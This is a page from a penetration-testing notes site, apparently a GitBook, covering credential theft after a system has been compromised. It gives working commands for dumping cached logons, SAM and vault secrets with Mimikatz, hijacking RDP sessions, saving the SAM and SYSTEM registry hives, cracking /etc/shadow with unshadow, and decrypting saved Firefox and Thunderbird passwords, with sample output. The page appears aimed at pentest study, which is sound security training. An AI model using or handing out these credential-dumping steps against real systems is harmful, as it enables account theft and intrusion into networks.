Hacking Notes
  • What is this?
  • Reconnaissance 🗣
    • Information Gathering 🗣
  • Enumeration 🎯
    • Host Discovery 🛎
    • DNS Enumeration
    • OS Discovery 🖥
    • Port Scanning 📟
    • WAF Evasion
  • Web 📱
    • Unrestricted File Upload
    • Templates Injections ✖️
    • File Inclusion
    • Login Panes
    • SQL Injection
    • NoSQL Injection
    • OAuth 2.0 Bypass
  • Privilege Escalation
    • Linux Privesc
    • Windows Privesc
    • Run Commands AS
  • Post Explotation 💀
    • Port Forwarding and Tunneling
    • Transfering Files 📤
    • Reverse Shell 🔙
    • Crypto 101 👁
    • AV Evasion
    • Bypass UAC
    • Get Credentials
  • Services
    • PORT 21/tcp - FTP
    • PORT 25/tcp - SMTP
    • PORT 53/tcp/udp - DNS
    • Port 80,443/tcp - HTTP
    • Port 111/tcp - RPCBind
    • PORT 143,993/tcp - IMAP
    • PORT 139,445/tcp - SMB
    • PORT 161/udp - SNMP
    • PORT 1100/tcp - Java RMI
    • PORT 1433/tcp - Microsoft SQL Server
    • PORT 2049/tcp - NFS
    • PORT 3306/tcp MySQL
    • PORT 3389/tcp RDP
    • PyPI Server
  • Software
    • Tomcat
    • Jenkins
    • Drupal
    • Wordpress
  • Client-Side Attacks
    • Evil PDF
    • Microsoft Office Macros
  • Other
    • Hacking WiFI
      • WPA/WPA2 PSK
      • WPA/WPA2 PEAP (Enterprise)
      • WEP
    • Hacking with Powershell
    • Hacking AWS
  • Exploiting
    • Buffer Overflow
  • Active Directory
    • 🖥️AD Attacks
Powered by GitBook
On this page
  • Looking for Interesting Files
  • Mimikatz
  • Hijacking RDP Session
  • SAM and SYSTEM (Win)
  • PASSWD and SHADOW (Lin)
  • Mozilla Firefox / Thunderbird / WaterFox / SeaMonkey

Was this helpful?

  1. Post Explotation 💀

Get Credentials

After compromising a target is important to recollect the maximum credentials to spray them on the network.

Looking for Interesting Files

If the target have a web application that use a database try to find the config.php file in order to obtain the database connection.

Look what type of applications are installed and look for config files in order to find new pair of creds.

Mimikatz

Dump all cached logon credentials, SAM, System, LSASS, VAULT....

.\mimikatz.exe
privilege::debug 
sekurlsa::logonpasswords full
sekurlsa::wdigest
sekurlsa::credman
lsadump::sam
vault::cred
vault::list
ts::mstsc
ts::sessions



.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "sekurlsa::wdigest" "sekurlsa::credman" "lsadump::sam" "vault::cred" "vault::list" "ts::mstsc" "exit"

Note: if sekurlsa::logoncredentials does not work in Windows 10 or Server 2019 download a older realease.

mimikatz.exe v 2.1.1

Hijacking RDP Session

To hijack a RDP session we need mimikatz.

.\mimikatz.exe
privilege::debug
ts::sessions
ts::mstsc
token::elevate
ts::remote /id:3

SAM and SYSTEM (Win)

You can easily dump the SAM and SYSTEM registries using the command prompt. Just open the cmd.exe as Administrator and run the following commands:

reg save HKLM\SAM c:\windows\temp\sam
reg save HKLM\SYSTEM c:\windows\temp\system

Finally on our kali we just need to use sam2dump to get the hashes.

samdump2 system sam > hashes.txt

PASSWD and SHADOW (Lin)

Same as Windows, when we pwn a privilege user such as root we can get system users and passwords. In linux we just need to copy the following files to our attacking machine.

/etc/passwd
/etc/shadow

Finally on our kali machine we just need to use unshadow to get the hashes:

unshadow passwd shadow > hashes.txt

Mozilla Firefox / Thunderbird / WaterFox / SeaMonkey

Some users victims uses Mozilla Firefox or Mozilla Thunderbird and stores their credentials without protection.

On windows search the following route:

C:\Users\VICTIM\AppData\Roaming

Zip the content of Firefox or Thunderbird folder and transfer it to the attacking machine. Once transferred we are going to use firefox-decrypt tool to get the plaintext credentials.

$ python firefox_decrypt.py /folder/containing/profiles.ini/

Master Password for profile /tmp/Thunderbird/Profiles/s68bba5j.default: 
2021-09-21 19:55:06,811 - WARNING - Attempting decryption with no Master Password

Website:   mailbox://test.local
Username: 'eric'
Password: 'sup3rs3cr3t'

Website:   smtp://test.local
Username: 'eric'
Password: 'sup3rs3cr3t'
PreviousBypass UACNextPORT 21/tcp - FTP

Last updated 3 years ago

Was this helpful?

LogoGitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHub